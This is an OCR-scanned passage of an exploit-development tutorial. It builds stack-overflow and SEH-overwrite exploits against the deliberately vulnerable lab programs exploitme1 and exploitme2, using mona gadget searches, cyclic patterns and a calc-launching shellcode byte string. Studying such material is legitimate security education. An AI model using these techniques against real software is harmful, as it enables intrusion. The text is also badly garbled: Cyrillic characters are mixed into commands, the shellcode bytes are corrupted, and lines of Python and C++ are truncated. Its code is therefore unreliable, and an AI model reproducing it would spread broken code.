noaslr | Show modules that are not aslr or rebased 

nosafeseh | Show modules that are not safeseh protected 

nosafesehaslr | Show modules that are not safeseh protected, not aslr and not rebased 
offset | Calculate the number of bytes between two addresses 

pageacl / pacl | Show ACL associated with mapped pages 

pattern create / pc | Create a cyclic pattern of a given size 

pattern offset / po | Find location of 4 bytes in a cyclic pattern 

peb / peb | Show location of the PEB 

rop | Finds gadgets that can be used in a ROP exploit and do ROP magic with them 
ropfunc | Find pointers to pointers (IAT) to interesting functions that can be used in your ROP chain 
seh | Find pointers to assist with SEH overwrite exploits 


sehchain / exchain | Show the current SEH chain 


skeleton | Create a Metasploit module skeleton with a cyclic pattern for a given type of exploit 


stackpivot | Finds stackpivots (move stackpointer to controlled area) 

stacks | Show all stacks for all threads in the running application 

string / str | Read or write a string from/to memory 

suggest | Suggest an exploit buffer structure 

teb / teb | Show TEB related information 

tobp / 2bp | Generate WinDbg syntax to create a logging breakpoint at given location 
unicodealign /ua | Generate venetian alignment code for unicode stack buffer overflow 


update / up | Update mona to the latest version 


Want more info about a given command 2 Run !топа help 





The line we're interested in is this: 
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jmp / j | Find pointers that will allow you to jump to a register 


Let's try it: 


0:000> !py mona jmp 


Hold on... 

[+] Command used: 

Іру mona.py jmp 

Usage : 

Default module criteria : non aslr, non rebase 


Mandatory argument: -r where reg is a valid register 


[+] This топа.ру action took 0:00:00 





OK, we need another argument: 


0:000» !py mona jmp -r ESP 
Hold оп... 
[+] Command used: 


Іру mona.py jmp -r ESP 


[*] Processing arguments and criteria 
- Pointer access level : X 

[+] Generating module info table, hang on... 
- Processing modules 


- Done. Let's rock 'n roll. 


[*] Querying 0 modules 


- Search complete, processing results 
[+] Preparing output file 'jmp.txt 
- (Re)setting logfile jmp.txt 


Found a total of O pointers 


[+] This топа.ру action took 0:00:00.110000 
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Unfortunately, it didn't find any module. The problem is that all the modules support ASLR (Address Space 
Layout Randomization), i.e. their base address changes every time they're loaded into memory. For now, 
let's pretend there is no ASLR and search for JMP ESP in the kernel32.dll module. Since this module is 
shared by every application, its position only changes when Windows is rebooted. This doesn't make it less 
effective against exploits, but until we reboot Windows, we can pretend that there is no ASLR. 


To tell mona to search in kernel32.dl| we'll use the global option -т: 


0:000> !py mona jmp -r ESP -m kernel32.dll 
Hold оп... 
[+] Command used: 


Іру mona.py jmp -r ESP -m kernel32.dll 


[*] Processing arguments and criteria 
- Pointer access level : X 
- Only querying modules kernel32.dll 
[+] Generating module info table, hang on... 
- Processing modules 
- Done. Let's rock 'n roll. 
[+] Querying 1 modules 


- Querying module kernel32.dll 


^ Memory access error in "ру mona jmp -r ESP -m kernel32.dll' 


** Unable to process searchPattern 'mov eax,esp # jmp eax’. ** 
- Search complete, processing results 
[+] Preparing output file 'jmp.txt 
- (Re)setting logfile jmp.txt 
[+] Writing results to jmp.txt 
- Number of pointers of type ‘call esp' : 2 
- Number of pointers of type 'push esp # ret ' : 1 
[+] Results : 


0x760e7133 | 0x760e7133 (b+0x00037133) : call esp | ascii (PAGE EXECUTE READ) [kernel32.dll] ASLR: True, Rebas 
е: False, SafeSEH: True, OS: True, мб.1.7601.18409 (C:\Windows\syswow64\kernel32.dll) 


0x7614ceb2 | 0х7614сер2 (b*0x0009ceb2) : call esp | (PAGE EXECUTE READ} [kernel32.dll] ASLR: True, Rebase: Fal 
se, SafeSEH: True, OS: True, v6.1.7601.18409 (C:\Windows\syswow64\kernel32.dll) 
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0х7610а980 | 0х7610а980 (b+0x0005a980) : push esp # ret | (PAGE EXECUTE READ) [kernel32.dll] ASLR: True, Reb 
ase: False, SafeSEH: True, OS: True, v6.1.7601.18409 (C:\Windows\syswow64\kernel32.dll) 


Found a total of 3 pointers 


[*] This mona.py action took 0:00:00.172000 





OK! It found three addresses. Let's use the last one: 
0х7610а980 | 0х7610а980 (b+0x0005a980) : push esp # ret | (PAGE EXECUTE READ) 
Let's verify that the address is correct: 


0:000» и 0x7610a980 

kernel32! GetProfileStringW *0x1d3e4: 

7610a980 54 push esp 

76108981 сз ret 

7610a982 1076db adc byte ptr [esi-25h],dh 

76103985 fa cli 

7610а986 157640c310 аас еах,10С34076һ 

7610a98b 76c8 ре kernel32!GetProfileStringW+0x1d3b9 (7610a955) 
7610a98d fa cli 

7610а98е 1576302310 adc eax,10C33076h 





As you can see, mona will not just search for ЈМР instructions but also for CALL and PUSH+RET 
instructions. So, we need to overwrite ret eip with 0x7610a980, i.e. with the bytes “\х80\ха9\х10\х76” 
(remember that Intel CPUs are little-endian). 


Let’s write a little Python script. Let’s open IDLE and enter: 
Рућоп 


2n(‘c:\\name.dat’, 'wb') as f: 
\х80\ха9\х10\х76' 





Restart exploitme1.exe in WinDbg, hit F5 and WinDbg will break on our shellcode (0хСС is the opcode for 
int 3 which is used by debuggers as a software breakpoint): 


(1адс.1750): Break instruction exception - code 80000003 (first chance) 
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*** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\Windows\syswow64\kernel32.dll - 
еах=00000000 ебх=00000000 есх=6а383071 ейх=002е5437 еѕі=00000001 еа!=00000000 
еір=001с#8 esp=001cfbf8 ерр=61616161 іорі=0 nv up ei pl zr na pe nc 


с5-0023 55-002р ds-002b es-002b 15=0053 gs-002b efl-00000246 
001cfbf8 cc int 3 





Now let's add real shellcode: 
Python 


! open('c:\\name.dat'’, 'wb") as f: 

ret eip = '\x80\xa9\x10\x76' 

shellcode = ("\xe8\xfflxfflxfflxfflxcO\xSfixb9\x1 1\x03\x02\x02\x81\xf1\x02\x02"+ 
"\x02\x02\x83\xc7\x1d\x33\xf6\xfc\x8a\x07\x3c\x02\x0f\x44\xc6\xaa"+ 
"\xe2\xf6\x55\x8b\xec\x83\xec\x0c\x56\x57\xb9\x7fixc0\xb4\x7b\xe8"+ 
"\x55\x02\x02\x02\xb9\xe0\x53\x31\x4b\x8b\xf8\xe8\x49\x02\x02\x02"+ 
"\x8b\xfO\xc7\x4 5\xf4\x63\x6 1\x6c\x6 3\x6alx05\x8d\x45\xf4\xc 7\x45"+ 
"\xf8\x2e\x65\x78\x65\x50\xc6\x45\xfc\x02\xffixd7\x6a\x02\xffixd6"+ 
"\xSf\x33\xcO\xSe\x8b\xe5\x5d\xc3\x33\xd2\xeb\x 10\xc1\xca\xOd\x3c"+ 
"\x6 1\xOf\xbe\xcO\x7c\x03\x83\xe8\x20\x03\xd0\x4 1\x8a\x01\x84\xcO"+ 
"\x75\xea\x8b\xc2\xc3\x8d\x4 1\xf8\xc3\x55\x8b\xec\x83\xec\x14\x53"+ 
"\X56\x57\x89\x4 d\xf4\x64\xa 1\x30\x02\x02\x02\x89\x4 5\xfc\x8b\x45"+ 
"\xfc\x8b\x40\x0c\x8b\x40\x14\x8b\xf8\x89\x45\xec\x8b\xcfixe8\xd2"+ 
"\xfflxfflxffix8b\x3fx8b\x70\x1 8\x85\xf6\x74\x4fx8b\x46\x3c\x8b"+ 
"\x5c\x30\x7 8\x85\xdb\x74\x44\x8b\x4c\x33\x0c\x03\xce\xe8\x96\xff"+ 
"\xfflxffix8b\x4c\x33\x20\x89\x4 5\xf8\x03\xce\x33\xcO\x89\x4d\xfO"+ 
"\x89\x4 5\xfc\x39\x44\x33\x 1 8B\x76\x22\x8b\x0c\x81\x03\xce\xe8\x75"+ 
А ЋХОЗ ХА 5\xf8\x39\x4 S\xf4\x74\x1 elx8b\x45\xfc\x8b\x4d"+ 
"\xfO\x4.0\x89\x45\xfc\x3b\x44\x33\x18\x72\xde\x3b\x7d\xec\x75\x9c"+ 
"\x33\xcO\xSfix5e\x5b\x8b\xed\x5d\xc3\x8b\x4d\xfc\x8b\x44\x33\x24"+ 
"\x8d\x04\x48\xOfl\xb7\xO0c\x30\x8b\x44\x33\x1c\x8d\x04\x88\x8b\x04"+ 
"\x30\x03\xc6\xeb\xdd") 

name = 'a'*36 + ret eip + shellcode 

f.write(name) 





That shellcode was created by using 
С++ 


#define HASH ExitThread 0х403153е0 
#define НА5Н WinExec Ox7bb4c07f 


int entryPoint() { 
DefineFuncPtr(WinExec); 
DefineFuncPtr(ExitThread); 


char calc[] = { С 'a', И ice ЫГ 'e', EXE 'e', Мој y 
My WinExec(calc, SW SHOW); 
Му ExitThread(0); 
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Have a look at the article about she!llcode for a refresher. 


If you now run exploitme1.exe, a calculator should pop up. Wow... our first exploit! 


Troubleshooting 


If the exploit doesn’t work on your system, it might be because of limited space on the stack. Read the 
article More space on the stack. 
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Exploitme2 (Stack cookies & SEH) 


If you haven't already, read the previous article (Exploitme1) and then come back here. 
We'll use the same code as before: 
С++ 


#include <cstdio> 


int main() { 





This time, however, we'll configure things differently. 


In VS 2013, we'll disable DEP by going to Project—properties, and modifying the configuration for Release 
as follows: 


• Configuration Properties 
о Linker 
. Advanced 
. Data Execution Prevention (DEP): No (/INXCOMPAT:NO) 


Make sure that we have 


• Configuration Properties 
о C/C++ 
. Code Generation 
. Security Check: Enable Security Check (/GS) 


If you still have the file c:\name.dat used for exploitme1.exe, and try to run exploitme2.exe, you'll get a crash 
and no calculator. Why? 


Here’s the corresponding assembly code: 


int main() { 


00101000 55 push ebp 

00101001 8B EC mov ebp,esp 

00101003 83 EC 24 sub esp,24h 

00101006 А1 00 30 1000 mov eax,dword ptr ds:[00103000h] 
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0010100B 33 C5 xor eax,ebp 

0010100D 89 45 FC mov dword ptr [ebp-4],eax 
char name[32]; 
printf("Enter your name and press ENTER WM"); 

00101010 68 00211000 push 102100ћ 

00101015 FF 15 90 20 1000 са! dword ptr ds:[102090h] 
scanf("%s", name); 

0010101B 8D 45 DC lea eax,[name] 

0010101E 50 push eax 

0010101F 68 24 21 10 00 push 102124h 

00101024 FF 1594201000 call dword ptr ds:[102094h] 


printf("Hi, Yos!\n", name); 
0010102A 8D 45 DC lea eax,[name] 


0010102D 50 push eax 

0010102E 68 28211000 push 102128h 

00101033 FF 15 90 20 1000 call dword ptr ds:[102090h] 
return 0; 

) 

00101039 8B 4D FC том ecx,dword ptr [ebp-4] 

0010103C 83 C4 14 ада езр,14ћ 

0010103F 33 CD xor 516951010) 

00101041 33 CO xor eax,eax 

00101043 E8 04 00 00 00 call — security check cookie (010104Ch) 

00101048 8B E5 mov esp,ebp 

0010104A 5D (61010) ebp 

0010104B C3 ret 





Here’s the old code for comparison: 


int main() ( 


01391000 55 


01391001 8B EC 
01391003 83 EC 20 
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char name[32]; 
printf("Enter your name and press ENTER\n"); 

01391006 68 00 21 39 01 push 1392100h 

0139100B FF 15 8C 203901 call dword ptr ds:[139208Ch] 
scanf("%s", name); 

01391011 8D 45 EO lea eax,[name] 

01391014 50 push eax 

01391015 68 24 21 39 01 push 1392124h 

0139101A FF 15 94 20 3901 call dword ріг ds:[1392094h] 


printf("Hi, Yos!\n", name); 
01391020 8D 45 EO lea eax,[name] 


01391023 50 push eax 
01391024 68 28 21 39 01 push 1392128h 
01391029 FF 15 8C 20 39 01 са! dword ptr ds:[139208Ch] 
0139102F 83 C4 14 ада езр,14ћ 
return 0; 
01391032 33 CO eax,eax 
) 
01391034 8B Е5 mov 25:19 1919) 
01391036 5D (91010) 51010) 
01391037 C3 ret 


Let's omit the uninteresting bits. 
Old code: 


int main() ( 

01391000 55 ebp 
01391001 8B EC ebp,esp 
01391003 83 EC 20 esp,20h 


01391034 8B E5 
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01391036 5D 


01391037 C3 





New code: 


int main() ( 
00101000 55 
00101001 8B EC 
00101003 83 EC 24 
00101006 A1 00 30 10 00 
0010100B 33 C5 
0010100D 89 45 FC 


push (Jojo) 


mov ebp,esp 
esp,24h 


eax,dword ptr ds:[00103000h] 


sub 
mov 
xor eax,ebp 


mov dword ptr [ebp-4],eax 


00101039 8B 4D FC 
0010103C 83 C4 14 
0010103F 33 CD 
00101041 33 CO 
00101043 E8 04 00 00 00 
00101048 8B E5 
0010104A 5D 

0010104B C3 


mov 


add 


есх,дмога ptr [ебр-4] 
езр,14ћ 
xor 21041010) 
хог eax,eax 
call — security check cookie (010104Ch) 
mov esp,ebp 
pop ebp 


ret 
After the prolog of the new code, the stack should look like this: 


esp --> name[0..3] 


name[4..7] 


name[28..31] 


ebp-4 --» cookie 


ebp --> saved ebp 
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The idea is that ће prolog sets the and the checks that the cookie isn't changed. If the cookie 
was changed, the epilog crashes the program before the ret instruction is executed. Note the position of the 
cookie: if we overflow , we overwrite both the cookie and . The epilog crashes the program 
before we can take control of the execution flow. 


Let's look at the prolog: 


00101006 A1 00 30 10 00 mov eax,dword ptr ds:[00103000h] 
0010100B 33 C5 xor eax,ebp 
0010100D 89 45 FC mov dword ptr [ebp-4],eax 





First the cookie is read from and then it's xored with EBP before it's saved in . This 
way, the cookie depends on EBP meaning that nested calls have different cookies. Of course, the cookie in 
is random and was computed at runtime during the initialization. 


Now that we understand the problem, we can go back to the version of our code, which is easier (па 
sense) to exploit: 


С++ 


#include <cstdio> 


int main() { 
char name[32]; 
printf("Reading name from file...\n"); 


FILE 4 = fopen("c:\\name.dat", "rb"); 
(!f) 

fseek(f, OL, SEEK END); 

long bytes = ftell(f); 

fseek(f, OL, SEEK SET); 

fread(name, 1, bytes, f); 

name[bytes] = '\0'; 

fclose(f); 


printf("Hi, Jos n", name); 
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Since we can't take control of EIP through ret eip, we'll try to modify the SEH chain by overwriting it. Lucky 
for us, the chain is on the stack. See the Structure Exception Handling (SEH) article if you don’t remember 
the specifics. 


Open exploitme2.exe in WinDbg, put a breakpoint on main with 


bp exploitme2!main 


and then let the program run by pressing F5 (go). 


When the execution stops (you should also see the source code) have a look at the stack and the SEH 
chain: 


0:000> dd esp 

0038fb20 011814d9 00000001 00625088 00615710 
0038fb30 bdOc3ff1 00000000 00000000 7efde000 
0038fb40 00000000 0038fb30 00000001 00381098 
0038fb50 01181969 bc2ce695 00000000 0038fb68 
0038fb60 75dd338a 7efde000 0038fba8 77c09f72 
00380070 7efde000 77ebad68 00000000 00000000 


00381080 7еїде000 00000000 00000000 00000000 
00387090 00381074 00000000 ffffffff 77с47115 
0:000> !ехсһаіп 
0038fb4c: exploitme2! except ћапајег4+0 (01181969) 
CRT scope 0, filter: exploitme2! . tmainCRTStartup+115 (011814f1) 
func: exploitme2! tmainCRTStartup-* 129 (01181505) 
0038fb98: ntdll!WinSqmSetlfMaxDWORD+31 (77с47115) 





Remember that SEH nodes are 8-byte long and have this form: 


«ptr to next SEH node in list 


<ptr to handler> 





We can see that the first node is at address Ox38fb4c (i.e. esp+0x2c) and contains 


0038fb98 «-- next SEH node 


01181969 <-- handler (exploitme2!_ except_handler4) 





The next and last SEH node is at 0x38fb98 (i.e. еѕр+0х78) and contains 
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ffffffff «-- next SEH node (none - this is the last node) 


77с47115 <-- handler (ntdll!WinSqmSetlfMaxDWORD+31) 





Now put 100 'a's in c:\name.dat and step over the code (F 10) until you have executed the fread() function. 
Let’s examine the SEH chain again: 

0:000> !exchain 

0038fb4c: 61616161 

Invalid exception stack at 61616161 





As we can see, we managed to overwrite the SEH chain. Now let the program run (F5). 


WinDbg will print the following: 


STATUS STACK BUFFER OVERRUN encountered 

(1610.1618): Break instruction ехсерйоп - code 80000003 (first chance) 

“ERROR: Symbol file could not be found. Defaulted to export symbols for C:\Windows\syswow64\kernel32.dll - 
еах-00000000 ерх-01182108 есх=75е1047с edx-0038f4d1 esi-00000000 edi-6d5ee060 

ер=75е10254 езр=00381718 ебр=00381794 iopl=0 nv up ei pl zr па ре nc 

с5=0023 ss-002b ds-002b es-002b fs-0053 gs-002b еН=00000246 

kernel32! GetProfileStringW *0x12cc1: 

75e1025d cc int 3 





This might mean that the epilog of main() detected that the cookie was modified and stopped us before we 
could do anything, but, actually, this security violation is due to some bounds checking related to the 
assignment after fread: 


С++ 
#include <cstdio> 
int main() { 

char name[32]; 


printf("Reading name from file...\n"); 


FILE 4 = fopen("c:\\name.dat", "rb"); 
if (!f) 


return -1; 
fseek(f, OL, SEEK END); 
long bytes - ftell(f); 
fseek(f, OL, SEEK SET); 
fread(name, 1, bytes, f); 
name[bytes] = "0: | <------------------------- 
fclose(f); 
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i, Jos", name); 
n 0; 


printf(" 





Here's the bounds checking: 


name|bytes] = 10" 
008B107A 83 FE 20 cmp esi,20h ; esi = bytes 
008B107D 73 30 jae main+0AFh (08B10AFh) 
008B107F 57 push edi 
008B1080 C6 44 35 DC 00 mov byte ptr name[esi],O 


008B10AF Е8 48 01 00 00 call . report rangecheckfailure (08B11FCh) 





In this case the epilog is never reached because of the bounds checking but the concept is the same. We 
overwrote the SEH chain but no exception was generated so the SEH chain wasn't even used. We need to 
raise an exception before the bounds checking is performed (ог the epilog of is reached). 


Let’s do an experiment: let’s see if an exception would call the handler specified on the SEH chain. Modify 
the code as follows: 


С++ 


#include <cstdio> 


int main() { 
char name[32]; 
printf("Reading name from file...\n"); 


FILE *f = fopen("c:\\name.dat", "rb"); 
if (!f) 

return -1; 
fseek(f, OL, SEEK END); 
long bytes - ftell(f); 
fseek(f, OL, SEEK SET); 
fread(name, 1, bytes, f); 
name[bytes] = bytes / 0; 
fclose(f); 


printf("Hi, Jos n", name); 


, 
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Note that we added a division by 0 right after the fread() function. This should generate ап exception and 
call the first handler of the SEH chain. 


Compile the code, reopen it in WinDbg and hit F5 (go). This is what happens: 


(177с.1214): Integer амде-ђу-гего - code с0000094 (first chance) 


First chance exceptions are reported before any exception handling. 

This exception may be expected and handled. 

*** WARNING: Unable to verify checksum for exploitme2.exe 

еах=00000064 ерх=6а5ее060 есх-00000000 ейх=00000000 еѕі=00000001 еаї-00000064 
ер=0121107а esp=002cfbd4 ебр=002сГс2с (01615540) nv up ei pl zr па ре nc 

cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010246 
exploitme2!main+0x7a: 

012f107a f7f9 idiv eax,ecx 





As we can see, WinDbg caught the exception before it could be seen by the program. Hit F5 (go) again to 
pass the exception to the program. Here’s what we see: 


(177c.12f4): Access violation - code с0000005 (first chance) 

First chance exceptions are reported before апу exception handling. 

This exception may be expected and handled. 

еах=00000000 ebx-00000000 есх-61616161 edx-77c2b4ad еѕі=00000000 edi-00000000 
еір=61616161 esp=002cf638 ebp=002cf658 (01015540) nv up ei pl zr na pe nc 

с5=0023 ss-002b ds-002b es-002b fs-0053 gs-002b efl=00010246 

61616161 22 22? 





We can see that EIP = 0x61616161. The only explanation is that the handler in the modified SEH chain was 
called! 


Now we must find a way to raise an exception on our own before the bounds checking is performed (or the 
cookie is checked by the epilog of the main() function). First of all, we’ll remove the exception and change 
our code a little: 


С++ 
#include <cstdio> 
int main() { 


char name[32]; 
printf("Reading name from file...\n"); 





FILE *f = fopen("c:\\name.dat", "rb"); 
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if (!f) 
return -1; 
fseek(f, OL, SEEK END); 
long bytes = ftell(f); 
fseek(f, OL, SEEK SET); 
int pos 7 0; 
(pos < bytes) ( 
int len = bytes - pos > 200 2 200 : bytes - pos; 
fread(name + pos, 1, len, f); 
pos += len; 


name[bytes] = '\0'; 
fclose(f); 


printf("Hi, %$!\п", name); 


, 





We decided to read the file in blocks of 200 bytes because may fail if it’s asked to read too many 
bytes. This way we can have a long file. 


The stack is not infinite so if we keep writing to it till the end (highest address) an access violation will be 
raised. Let’s run and try with 1000 “а“$: 


Python 


open(‘c:\\name.dat’, мр") as f: 





ТэмШе(а” 1000) 


By running in WinDbg it's easy to verify that 1000 “a“s aren't enough. Let's try with 2000: 
Python 


open('c:\\name.dat’, мр") as f: 





f.write('a^2000) 


It doesn't work either. Finally, with 10000 “а“$, we get this: 


(1794.1244): Access violation - code с0000005 (first chance) 
First chance exceptions are reported before апу exception handling. 
This exception may be expected and handled. 


*** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\Windows\SysWOW64\MSVCR120.dll - 


eax-00816808 ерх-000000с8 есх=00000030 edx-000000c8 esi-008167d8 еаг-003с0000 
eip=6d51f20c esp=003bfb68 ebp=003bfb88 iopl=0 nv up ei ng nz na pe cy 

cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010287 
MSVCR120!weslen+0x19: 
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6d51f20c f3a4 rep movs byte ptr es:[edi],byte ptr [esi] 


After pressing F5 (go) we get: 


(1794.1244): Access violation - code с0000005 (first chance) 


First chance exceptions are reported before any exception handling. 

This exception may be expected and handled. 

еах=00000000 ерх=00000000 есх-61616161 едх-77с204аа еѕі=00000000 еаг-00000000 
еір=61616161 esp=003bf5cc ebp=003bf5ec іоріІ=0 пу up ei pl zr па ре пс 

cs=0023 ss=002b ds=002b es-002b fs=0053 gs=002b efl=00010246 

61616161 ?? 22? 





This is what we wanted: EIP = 0x61616161. We know that our “a“s overwrote the handler address of a SEH 
node, but which 4 “a“s exactly? In other words, at what offset in the file should we put the address we want 
to redirect the execution to? 


An easy way to do this is to use a special pattern instead of simple “a“s. This pattern is designed so that 
given 4 consecutive bytes of the pattern we can tell immediately at which offset of the pattern these 4 bytes 
are located. 


mona (article) can help us with this: 


0:000> !ру топа pattern create 10000 
Ноја оп... 
[+] Command used: 
Іру mona.py pattern create 10000 
Creating cyclic pattern of 10000 bytes 
Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9AbOAb 1Ab2Ab3Ab4Ab5Ab6Ab7AbB...(Snipped) 
[+] Preparing output file 'pattern.txt' 
- (Re)setting logfile pattern.txt 


Note: don't copy this pattern from the log window, it might be truncated ! 


It's better to open pattern.txt and copy the pattern from the file 


[+] This топа.ру action took 0:00:00 





With a little bit of Python we can write the pattern to c:\name.dat: 
Python 
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Aname.dat', 'wb') as f: 
'Aa0Aa1Aa2Aa3Aa4AabAa6Aa7 Aa8Aa9AbOAb1Ab2Ab3AbA4ADb5Ab6Ab7ADS...(snipped)' 
er ? 





irn) 


Note that | snipped the pattern because it was too long to show here. 


We restart exploitme2.exe in WinDbg, we hit F5 (go) twice and we get: 


(11е0.11е8): Access violation - code с0000005 (first chance) 

First chance exceptions are reported before апу exception handling. 

This exception may be expected and handled. 

еах-00000000 ерх-00000000 ecx-644 13963 edx-77c2b4ad еѕі=00000000 edi-00000000 
eip=64413963 esp-0042f310 ebp-0042f330 iopl-0 nv up ei pl zr na pe nc 

cs=0023 ss-002b ds-002b es=002b fs=0053 gs=002b efl=00010246 

64413963 ?? 22? 





We can see that EIP = 0x64413963. Let's see at which offset of the pattern it's located. Remeber that Intel 
CPUs are little endian so 0x64413963 = “\x63\x39\x41\x64”" = “c9Ad”. Let's use mona to determine the 
offset: 

0:000> !py mona pattern_offset 64413963 

Hold on... 

[+] Command used: 

Іру mona.py pattern offset 64413963 

Looking for c9Ad т pattern of 500000 bytes 

- Pattern c9Ad (0x64413963) found in cyclic pattern at position 88 

Looking for c9Ad in pattern of 500000 bytes 

Looking for dA9c in pattern of 500000 bytes 

- Pattern dA9c not found in cyclic pattern (uppercase) 

Looking for сдАа in pattern of 500000 bytes 

Looking for ЧА9с in pattern of 500000 bytes 


- Pattern dA9c not found in cyclic pattern (lowercase) 





[*] This mona.py action took 0:00:00.172000 


The offset is 88. Let's verify that that's the correct offset with the following Python script: 
Python 
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Aname.dat', 'wb') as f: 





handler + 'c'*(10000-88-len(handler))) 


This time WinDbg outputs this: 


(1b0c.1bf4): Access violation - code с0000005 (first chance) 

First chance exceptions are reported before any exception handling. 

This exception may be expected and handled. 

eax-00000000 ерх-00000000 есх-62626262 edx-77c2b4ad еѕі=00000000 edi-00000000 
еір=62626262 esp-002af490 ebp-002af4b0 iopl=0 nv up ei pl zr na pe nc 

с5=0023 ss-002b ds-002b es-002b fs-0053 gs-002b efl=00010246 

62626262 ?? 22? 





Since 0x62626262 = "bbbb', this is exactly what we wanted. 


Now that we know where to put our address in the file, we need to decide which address to use. In WinDbg 
click on View—Memory and under “Virtua!:” type @esp to see the part of stack pointed to by ESP. In my 
case, ESP = 0x2af490 and our “b“s are at @esp+6d4. 


Let's restart exploitme2.exe to see if 644 is a constant. Enter again @esp+6d4 under “Virtual:” in the 
Memory window and you should see that it still points to our 4 “b“s. We can also see that ESP is always 
different, even though the offset 6d4 doesn’t change. 


So we could put our shellcode right after the 4 “b“s and replace those “b“s with the address of a piece of 
code like this: 


Assembly (x86) 


, 6d8 





Note that we used 648, i.e. 6d4+4 to skip the “b“s and jump to the shellcode which we'll put in place of our 
“с“ѕ. Of course, ADD ESP, 660 or similar would do as well. Unfortunately, it’s not easy to find such code, but 
there's an easier way. 


Restart exploitme2.exe, hit F5 (go) twice and have another look at the stack: 


0:000> аа esp 
002df45c 77c2b499 00241544 002dfb2c 00241594 


002а#46с 002df518 002dfa84 77c2b4ad 002dfb2c 
002df47c O02df52c 77c2b46b 002df544 002dfb2c 
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002df48c 00241594 002df518 62626262 00000000 
002df49c 002df544 002dfb2c 77c2b40e 002df544 
0024Мас 002а%2с 00201594 002df518 62626262 


002df4bc 002e1000 002df544 00636948 00000000 
0024 4сс 00000000 00000000 00000000 00000000 





The dword at esp*8 looks interesting. If we have a look at that address we see the following: 


0:000» db poi(esp-*8) 

002dfb2c 61 61 61 61 62 62 62 62-63 63 63 63 63 63 63 63 ааааррррсссссссс 
O02dfb3c 63 63 63 63 63 63 63 63-63 63 63 63 63 63 63 63 сссссссссссссссс 
002dfb4c 63 63 63 63 63 63 63 63-63 63 63 63 63 63 63 63 сссссссссссссссс 
O02dfb5c 63 63 63 63 63 63 63 63-63 63 63 63 63 63 63 63 сссссссссссссссс 
O02dfb6c 63 63 63 63 63 63 63 63-63 63 63 63 63 63 63 63 сссссссссссссссс 
0024Ю7с 63 63 63 63 63 63 63 63-63 63 63 63 63 63 63 63 сссссссссссссссс 
O02dfb8c 63 63 63 63 63 63 63 63-63 63 63 63 63 63 63 63 сссссссссссссссс 
O02dfb9c 63 63 63 63 63 63 63 63-63 63 63 63 63 63 63 63 сссссссссссссссс 





It seems that Ox2dfb2c points to the 4 “a“s preceding our “b“s. Remember that “bbbb” overwrote the 
"handler" field of a SEH node, so Ox2dfb2c must point to the "next SEH node" field of the same SEH node. 
Let’s verify this: 

0:000> !exchain 

002df470: ntdil!ExecuteHandler2+3a (77c2b4ad) 

002dfa84: MSVCR120! ValidateRead+439 (6d52a0d5) 

002а62с: 62626262 

Invalid exception stack at 61616161 





It seems that we overwrote the third SEH node: 


0:000» dt _EXCEPTION_REGISTRATION_RECORD 002dfb2c 
ntdll!__EXCEPTION_REGISTRATION_RECORD 


+0x000 Next : 0x61616161 _EXCEPTION_REGISTRATION_RECORD 
+0x004 Handler : 0x62626262 _EXCEPTION_DISPOSITION +62626262 





First of all, make sure that esp+8 always contain the right address by restarting the process and trying again. 
After having verified that, we need to find something like this: 


http://expdev-kiuhnm.rhcloud.com 





- 117 - 





ЕХРГОГТ DEVELOPMENT COMMUNITY 


POP reg32 
POP reg32 


RET 





The idea is to put the address of such a piece of code in place of our 4 “b“s. When executed, this code will 
increment ESP by 8 (through the two POPs) and then extract the value pointed to by ESP and jump to it. 
This does exactly what we want, i.e. it'll jump to the 4 “a“s right before our “b“s. To skip the “b“s and jump to 


our shellcode (our “c“s), we need to put a jmp right before the “b“s. 
The opcode of a JMP short is 


ЕВХХ 


where ХХ is a signed byte. Let's add a label for convenience: 


here: 
EB XX 


That opcode jumps to Пеге+2+ХХ. For example, 


EB 00 


there: 


jumps right after the jump itself, i.e. to there. 


This is what we want: 


а [а ја [арр р с с рс сс сс 


ЕВ 06 90 90 | 





90 is the opcode for а NOP (no operation – it does nothing) but we can use whatever we want since those 
two bytes will by skipped. 


Now let's find the address of pop/pop/ret in kernel32.dll: 


0:000» !py mona findwild -s "pop r32#pop r32#ret" -m kernel32.dll 
Hold оп... 


[+] Command used: 


Іру mona.py findwild -s pop r32#pop r32#ret -m kernel32.dll 
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[*] Processing arguments and criteria 
- Pointer access level : X 
- Only querying modules kernel32.dll 
[*] Type of search: str 
[+] Searching for matches up to 8 instructions deep 
[+] Generating module info table, hang on... 
- Processing modules 
- Done. Let's rock 'n roll. 
[+] Started search (8 start patterns) 
[+] Searching startpattern between 0x75dc0000 and 0x75ed0000 
[+] Preparing output file 'findwild.txt 
- (Re)setting logfile findwild.txt 
[+] Writing results to findwild.txt 
- Number of pointers of type 'pop edi # pop ebp # retn 24h' : 1 
- Number of pointers of type 'pop esi # pop ебх £ retn' : 2 
- Number of pointers of type 'pop ебх # pop ebp # retn 14h' : 4 
- Number of pointers of type 'pop ебх # pop ebp # retn 10h' : 14 
- Number of pointers of type 'pop edi # pop esi # retn' : 2 
- Number of pointers of type 'pop edi # pop ebp # retn 8' : 13 
- Number of pointers of type 'pop eax # pop ebp # retn 1ch' : 2 
- Number of pointers of type 'рор ecx # рор ebx # retn 4' : 1 
- Number of pointers of type 'pop esi # pop ebp # retn' : 1 
- Number of pointers of type 'pop ebx # pop ebp £ retn 1ch' 


- Number of pointers of type 'pop edi # pop ebp # retn 1ch' 


:4 
- Number of pointers of type 'pop eax £ pop ebp £ retn Och' : 8 
32 
22 


- Number of pointers of type 'pop eax # pop ebp # retn 20h' 

- Number of pointers of type 'pop esi # pop ebp # retn Och' : 49 
- Number of pointers of type 'pop eax # pop ebp # retn' : 2 

- Number of pointers of type 'pop eax # pop ebp # retn 4' : 3 

- Number of pointers of type 'pop esi # pop ebp # retn 20h' : 2 
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- Number of pointers of type 'pop ебх # pop ebp # retn Och' : 27 
- Number of pointers of type 'pop esi # pop ebp # retn 24h' : 1 

- Number of pointers of type 'pop eax # pop ebp £ retn 18h' : 3 
- Number of pointers of type 'pop edi # pop ebp # retn Och' : 11 
- Number of pointers of type 'pop esi # pop ebp # retn 10h' : 15 
- Number of pointers of type 'pop esi # pop ebp # retn 18h' : 10 
- Number of pointers of type 'pop esi # pop ebp # retn 14h' : 11 
- Number of pointers of type 'pop edi # pop ebp # retn 10h' : 6 
- Number of pointers of type 'pop eax # pop ebp # retn 8': 5 

- Number of pointers of type 'pop ебх # pop ebp # retn 4': 11 

